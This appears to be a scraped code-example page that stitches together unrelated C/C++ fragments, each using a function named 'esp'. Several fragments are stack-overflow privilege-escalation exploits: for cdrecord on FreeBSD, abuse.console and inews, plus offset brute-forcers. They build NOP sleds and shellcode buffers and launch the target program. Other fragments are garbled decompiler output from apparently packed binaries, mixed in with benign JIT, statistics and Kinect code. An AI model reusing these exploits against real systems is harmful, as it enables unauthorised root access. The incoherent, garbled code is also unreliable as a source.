예제 #1
0
unsigned Processor::call_thiscall_args(Register* obj, const char* args, va_list ap) {
	std::stack<Argument> arg_stack;
	std::unordered_set<unsigned char> used_regs;
	Register esp(*this, ESP, sizeof(void*) * 8);

	unsigned argCount = 0, floatCount = 0, intCount = 0, regCount = 0, stackBytes = 0;

	//Set the object as first argument
	if(obj) {
		if(!isIntArg64Register(intCount, argCount))
			stackBytes += pushSize();
		++argCount;
		++intCount;
		arg_stack.push(obj);
	}

	//Read the arguments in...
	while(args && *args != '\0') {
		if(*args == 'r') {
			Register* reg = va_arg(ap,Register*);
			if(reg->xmm()) {
				if(!isFloatArg64Register(floatCount, argCount))
					stackBytes += pushSize();
				++floatCount;
			}
			else {
				if(!isIntArg64Register(intCount, argCount))
					stackBytes += pushSize();
				++intCount;
			}
			++regCount;
			arg_stack.push(reg);
		}
		else if(*args == 'm') {
예제 #2
0
__entry_point__()
{



    ecx = ecx & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173;
    eax = eax + ecx;
    ecx = ecx + edx;
    (save)0;
    *__imp__GetModuleHandleA();
    asm("Unknown opcode 0x0f");
    asm("Unknown opcode 0xc6");
    asm("hlt");
    edx = esp;
    for((save)149630669; 1; eax = eax - 149630660) {
        (restore)eax;
    }
    (save)edx;
    (save)eax;
    asm("rol dword [esp],0x5");
    (restore)edx;
    asm("bswap edx");
    *esp = *esp + edx + -1476385172;
    *esp();
    asm("adc eax,+0x35");
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *L20402008();
}
int main(int argc, char *argv[])
{
   long addr;
   char buf[LENGTH];
   char egg[EGGIE];
   int i,offset;
   
   printf("cdrecord exploit by sectorx (FreeBSD)\n");
   if (argc < 2) {
      printf("error: offset must be supplied as a parameter\n");
      printf("*note* FreeBSD 3.3-RELEASE\'s offset is 600\n\n");
      return;
   }
   offset = atoi(argv[1]);
   addr = esp()+offset;
   printf("Using offset 0x%x [%d], eip = 0x%x\n",offset,offset,addr); 
   /* build the overflow string */
   for (i=0;i<LENGTH;i+=4) *(long*)&buf[i] = addr;
   buf[LENGTH-1] = '\0';
   /* build the egg string */
   memset(&egg,0x90,sizeof(egg));
   memcpy(egg+(EGGIE-strlen(devilspawn)-1),devilspawn,strlen(devilspawn));
   egg[EGGIE-1] = '\0';
   
   setenv("EGG",egg,1);
   execl("/usr/local/bin/cdrecord","cdrecord-bin","dev=",buf,"/etc/fstab",0);
}
예제 #4
0
void bruteforce(char **path)
{
pid_t pid;
int x=0, offset=5;
long ret;

  printf("attemping brute force\n\n");

  if(!getuid())
  {
   printf("brute force cannot be run while uid is 0\n");
   exit(0);
  }
   ret=esp()+offset;
   while(getuid()&&(x<=3000&&x>=-3000))
   {
       if((pid=fork())==0)
       {
          exploit(ret,path);
          exit(0);
       }
       else perror("fork failed");

       if(waitpid(pid,NULL, 0)!= pid) perror("waitpid error");
       if(x>=3000)
       {
        ret=esp();
        x=-1;
       }
       else if(x<=3000&&x>=0)
       {
        ret+=offset;
        x+=offset;
       }
       else if(x>=-3000&&x<0)
       {
        ret-=offset;
        x-=offset;
       }
       printf("%d\n\n",x);
   }
  printf("brute force complete..\n\n");
  system("id");
}
예제 #5
0
void		run()
{
  int		i;

  for (i = 0; tab[i].believe != NULL; i++)
    {
      printf("f(x) = %s\n", tab[i].info);
      printf("E(x) = %.3f\n", esp(tab[i].believe, tab[i].failboat, tab[i].wincopter));
      printf("Var(x) = %.3f\n\n", var(tab[i].believe, tab[i].failboat, tab[i].wincopter));
    }
}
예제 #6
0
void Processor::call_cdecl_end(unsigned argBytes, bool returnPointer) {
	Register esp(*this, ESP, sizeof(void*) * 8);
	unsigned stackOffset = (stackDepth + argBytes) % 16;
	if(stackOffset != 0)
		argBytes += (16 - stackOffset);
#ifndef _MSC_VER
	if(returnPointer)
		argBytes -= 4;
#endif
	if(argBytes != 0)
		esp += argBytes;
}
예제 #7
0
main(int argc, char **argv)
{
  int i,j,offset;
  unsigned long eip;
  char buffer[4096];

  j=0;
  offset=atoi(argv[1]);
  eip=esp()+offset;
  for(i=0;i<1008;i++) buffer[i]=0x90;
  for(i=(BUFFSIZE - strlen(shell));i<BUFFSIZE;i++) buffer[i]=shell[j++];

  i=1005;
  buffer[i]=eip & 0xff;
  buffer[i+1]=(eip >> 8) & 0xff;
  buffer[i+2]=(eip >> 16) & 0xff;
  buffer[i+3]=(eip >> 24) & 0xff;

  printf("%s\nsh -i\n",buffer);
}
예제 #8
0
void  main(int argc,char *argv[])
{
	
	char cmd[1000];
	int i,x;
	long  retn;
	char buff[LEN];
	
	
	printf("\nUsage :- %s <offset>\n..",argv[0]);
	
	if(argc>1)
		retn=esp()-atoi(argv[1]);
	else
		retn=RET;

	printf("Using return Adress :- ",retn );

	for(i=0;i<LEN;i+=4)
	{
		*(long*)&buff[i]=retn;
	}

	for(i=0;i<(LEN-(strlen(shellcode)+8));i++)
	{
		*(buff+i)=NOP;

	}

	memcpy(buff+i,shellcode,strlen(shellcode));

	sprintf(cmd,"/usr/lib/games/abuse/abuse.console -net %s",buff);

	puts("executing .......");
	
	system(cmd);
	
	return;
}
예제 #9
0
int main(int argc,char **argv){
 char bof[600];			// give or take a few. (528)
 int i,offset,gid=NEWSGID;
 long ret;	
 FILE *inewsfile;
 if(argc>1){offset=atoi(argv[1]);}
 else{offset=DEFAULT_OFFSET;}
 ret=(esp()-offset);
 for(i=ALIGN;i<600;i+=4){*(long *)&bof[i]=ret;}
 exec[10]=gid;
 for(i=0;i<(600-strlen(exec)-100);i++){*(bof+i)=0x90;}
 memcpy(bof+i,exec,strlen(exec));
 unlink(TMPFILE); 		// clean house.
 inewsfile=fopen(TMPFILE,"w");
 fprintf(inewsfile,"From: %s\n",bof);			// required, woops.
 fprintf(inewsfile,"Newsgroups: %s\n",NEWSGROUP);	// required.
 fprintf(inewsfile,"Subject: %s\n\n",SUBJECT);		// required.
 fclose(inewsfile);
 printf("[ return address: 0x%lx, offset: %d, actual size: %d(sc=%d). ]\n",ret,offset,strlen(bof),strlen(exec));
 if(execlp(PATH,"inews","-h",TMPFILE,0)){
  printf("%s: failed, is %s the correct path?\n",argv[0],PATH);
  exit(-1);
 }
}
예제 #10
0
int main(int argc, char **argv)
{
int cnt, sel;
char *offset;
long returnaddr;

if(argc == 1)
{
  usage((char **)argv[0]);
  exit(1);
}

while((cnt = getopt(argc,argv,"t:b:o:")) != EOF)
  {
     switch(cnt)
     {
      case 't': //target distro
         sel = atoi(optarg);
         exploit(target[sel-1].ret,(char **)target[sel-1].path);
         break;
      case 'b': //brute force
         bruteforce((char **)target[sel-1].path);
         break;
      case 'o': //offset
         offset = atoi(optarg);
         returnaddr=esp()+offset;
         sel = atoi(optarg);
         exploit(returnaddr,(char **)target[sel-1].path);
         break;
      default:
         usage(&argv[0]);
         break;
     }
  }
  return(0);
}
예제 #11
0
double		var(double (*believe)(), double ko, double ok)
{
  double	inc;
  double	h;
  double	i;
  double	j;
  double	m;

  i = 0.f;
  j = 0.f;
  m = esp(believe, ko, ok);
  h = (double)((double)(ok - ko) / (double)ITER);
  for (inc = 1.f; inc <= (ITER - 1.f); inc += 1.f)
    {
      i += (((ko + inc * h) - m) * ((ko + inc * h) - m)) * believe(ko + inc * h);
    }
  i *= 2.f;
  for (inc = 0.f; inc <= (ITER - 1.f); inc += 1.f)
    {
      j += (((ko + inc * h + h / 2.f) - m) * ((ko + inc * h + h / 2.f) - m)) * believe(ko + inc * h + h / 2.f);
    }
  j *= 4.f;
  return (((double)(ok - ko) / (6.f * ITER)) * ((ko - m) * believe(ko) + (ok - m) * believe(ok) + i + j));
}
예제 #12
0
__entry_point__()
{



    eax = eax + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx;
    edx = *esp;
    asm("Unknown opcode 0x0f");
    asm("Unknown opcode 0xc6");
    asm("hlt");
    for(eax = 132853453; 1; eax = eax - 132853450) {
    }
    (save)eax;
    *esp = *esp - 2;
    (restore)eax;
    asm("bswap eax");
    (save)eax;
    *esp = *esp + -50321797;
    *esp = *esp + edx;
    asm("adc edx,+0x19");
    eax = *esp() - 21;
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    ecx = ecx + 1;
}
예제 #13
0
void Processor::call_cdecl_prep(unsigned argBytes) {
	unsigned stackOffset = (stackDepth + argBytes) % 16;
	Register esp(*this, ESP, sizeof(void*) * 8);
	if(stackOffset != 0)
		esp -= 16 - stackOffset;
}
예제 #14
0
L00411768()
{



    asm("aam 0xf0");
    *eax = *eax + 1;
    cl = 226;
    *eax = *eax + 1;
    ss = esp;
    *eax = *eax + 1;
    -1 = esi * eax;
    *(eax - 72) = *(eax - 72) + 226;
    *eax = *eax + 1;
    eax = eax & 65450;
    *edi = al;
    edi = edi + 1;
    *eax = *eax + 1;
    *(edx + 2046820572) = *(edx + 2046820572) + dl;
    ecx = -1771962368;
    *eax = *eax + al;
    if(!(edx = edx - 1)) {
    }
    *edx = *edx + dh;
    (save)eax;
    ah = ah + dl;
    asm("jecxz 0x41179a");
    *(ecx + -1912537145) = *(ecx + -1912537145) + dh;
    *edi = eax;
    edi = edi + 4;
    *eax = *eax + 1;
    -1 = *(edi + 1934098687) * ecx;
    *L0000FF57 = *L0000FF57 + ah;
    (save)ebp;
    *eax = *eax + 1;
    *(ecx - 36) = *(ecx - 36) + cl;
    *eax = *eax + al;
    eax :: 822083769;
    asm("xchg eax,esi");
    *eax = *eax + al;
    (save)eax;
    ah = (eax & 419430515) + dl;
    asm("aam 0xff");
    *(ecx + -1912537167) = *(ecx + -1912537167) + dh;
    asm("Unknown opcode 0x8e");
    *eax = *eax + 1;
    0 = *(ebx - 1) * ebp;
    eax = eax - 1 - 1;
    *eax = *eax + 1;
    eax = eax & 65317;
    bh = bh + bh;
    *eax = *eax + al;
    ah = ah + bl;
    *eax = *eax + al;
    *(ecx + -1778384896) = *(ecx + -1778384896) + bh;
    *eax = *eax + al;
    *ebx = *ebx + dh;
    *eax = *eax + al;
    (save)eax;
    bl = bl + ah;
    asm("aam 0xff");
    bh = bh + al;
    *(ebx + -1895759986) = *(ebx + -1895759986) + 255;
    if(!(0 = edi * edi)) {
        *eax = *eax + 1;
        (save)edi;
        eax = eax & 5570815;
        *eax = *eax + 1;
        ah = ah + bl;
        *L3100B900 = *L3100B900 + bh;
        *(esi + 1929389312) = *(esi + 1929389312) + dl;
        *L000000FE = *L000000FE + bl;
        *eax = *eax + dl;
        asm("lock aam 0xff");
        dl = dl + ah;
        cl = 255;
        ah = ah + dl;
        asm("Unknown opcode 0x8e");
        *eax = *eax + 1;
        asm("Unknown opcode 0xc6");
        0 = edi * edi;
        eax = 72;
        *L00000048 = *L00000048 + 1;
        asm("xchg eax,edx");
        ah = ah + bl;
        *edx = *edx + bh;
    }
    if(!( *edx = *edx + -1778359808)) {
    }
    al = al ^ *eax;
    (save)eax;
    bh = bh + bh;
    asm("aam 0xff");
    bh = bh + bh;
    cl = 255;
    bh = bh + bh;
    asm("Unknown opcode 0x8e");
    *eax = *eax + 1;
    goto ( *(ebx - 1));
    bh = bh + bh;
    eax = eax - 1;
    *eax = *eax + 1;
    goto ( *L00ff00ff);
    *eax = *eax + 1;
    (fsave)(frestore) + *eax + *eax;
    ecx = -1778337536;
    *(esi + 1929409280) = *(esi + 1929409280) + dl;
    *eax = *eax + dl;
    (save)eax;
    bh = bh + bh;
    asm("aam 0xf0");
    bh = bh + bh;
    ss = esp;
    0 = esi * eax;
    *(eax - 72) = *(eax - 72) - 1;
    bh = bh + bh + bh + bh + bh + bh + bh + bh;
    *edi = eax & 16711850;
    edi = edi + 1;
    ah = ah + bl;
    *(edx + 2046867712) = *(edx + 2046867712) + dl;
    *(esi + 1929404928) = *(esi + 1929404928) + dl;
    *edx = *edx + 226;
    (save)eax;
    *edx = *edx + dh;
    bh = bh + bh;
    asm("aam 0xe3");
    bh = bh + bh;
    cl = 199;
    gs = *(bh + bh + -1888747776);
    bh = bh + bh + bh + bh;
    if(!(eax = eax - 1)) {
    }
    goto ( *L00ff0057);
    (save)ebp;
    ah = ah + bl;
    *ecx = *ecx + cl;
    *L96003D00 = *L96003D00 + dh;
    *ebx = *ebx + dh;
    eax = eax & 419450880;
    bh = bh + bh;
    asm("aam 0xd4");
    bh = bh + bh;
    cl = 177;
    bh = bh + bh;
    asm("Unknown opcode 0x8e");
    es = *eax;
    goto ( *(ebx + 107));
    bh = bh + bh;
    eax = eax - 1 - 1;
    bh = bh + bh;
    eax = eax & 16711717;
    *eax = *eax + al;
    (fsave)(frestore) + *eax;
    *eax = *eax + al;
    ecx = -1778384896;
    *eax = *eax + al;
    *ebx = *ebx + dh;
    *eax = *eax + al;
    (save)eax;
    *eax = *eax + al;
    bh = bh + bh;
    asm("jecxz 0x4118ef");
    bh = bh + bh;
    asm("Unknown opcode 0xc7");
    cl = 0;
    goto ( *(ebx + -1879113586));
    if(!(-1 = *eax * eax)) {
        bh = bh + bh;
        (save)edi;
        ah = (eax & 5635840) + bl;
        ecx = ecx - 1;
        *eax = *eax + al;
        ecx = -1778384835;
        *eax = *eax ^ eax;
        *(ebx + 37) = *(ebx + 37) + dh;
        *eax = *eax + al;
        (save)eax;
        asm("sbb [eax],eax");
        bh = bh + bh;
        asm("lock aam 0x0");
        goto ( *edx);
        cl = 0;
        eax = *esp();
        es = *eax;
        esi = esi + 1;
        -1 = *eax * eax;
        ah = 11141120 + bl;
        asm("xchg eax,edx");
        *eax = *eax + al;
        ecx = -1778384774;
        asm("bound eax,[eax]");
        *(ebx + 74) = *(ebx + 74) + dh;
        *eax = *eax + al;
    }
예제 #15
0
esp KinectOpenNI::get(const base::timestamp frame)
{
   if(!_connected)
   {
        return esp();
   }
 //  QMutexLocker locker(&_mutex);

   g_depth.GetMetaData(g_depthMD);
   g_image.GetMetaData(g_imageMD);

   cv::Mat rgb;
   cv::Mat depth;


   const XnDepthPixel* pDepth = g_depth.GetDepthMap();//g_depthMD.Data();
   depth.create(480,640,CV_16UC1);
   assert((g_depthMD.XRes() == depth.cols) && (g_depthMD.YRes() == depth.rows)); 
   memcpy(depth.data,pDepth,640*480*2);

   const XnUInt8* pImage = g_imageMD.Data();
   rgb.create(480,640,CV_8UC3);
   assert(g_imageMD.PixelFormat() == XN_PIXEL_FORMAT_RGB24);
   memcpy(rgb.data,pImage,640*480*3);

   XnUInt64 F;
   XnDouble pixel_size;
   // get the focal length in mm (ZPS = zero plane distance)
   g_depth.GetIntProperty ("ZPD", F);
   // get the pixel size in mm ("ZPPS" = pixel size at zero plane)
   g_depth.GetRealProperty ("ZPPS", pixel_size);
   //qDebug() << F << pixel_size;

   RgbdKinect *kf = new RgbdKinect(pixel_size,F,_serial,rgb,depth,cv::Point3d(0,0,0));
   SEND(types::Rgbd,kf)

 /*  if(_sendKinectFrame)
   {
       const XnUInt8* pImage = g_imageMD.Data();
       rgb.create(480,640,CV_8UC3);
       assert(g_imageMD.PixelFormat() == XN_PIXEL_FORMAT_RGB24);
       memcpy(rgb.data,pImage,640*480*3);

       if(_send3d)
       {
           depth = retrievePointCloudAsImage(pDepth);
       }else{
           depth.create(480,640,CV_16UC1);
           memcpy(depth.data,pDepth,640*480*2);
       }
       types::Rgbd *kf = new types::Rgbd(_serial,rgb,depth,cv::Point3d(0,0,0));
       if(_send3d)
       {
           SEND_TAG(types::Rgbd,kf,"3D")
       }else{
           SEND(types::Rgbd,kf)
       }
   }
   if(_sendPointCloud)
   {
//       //qDebug() << "Send pc";
       SEND(PointCloud,xnPoint3DToPointCloud(retrievePointCloudMap(pDepth),640*480))
   }*/
   //xnWaitNoneUpdateAll
 //  g_context.WaitNoneUpdateAll();
   g_context.WaitAndUpdateAll();
   return esp();

}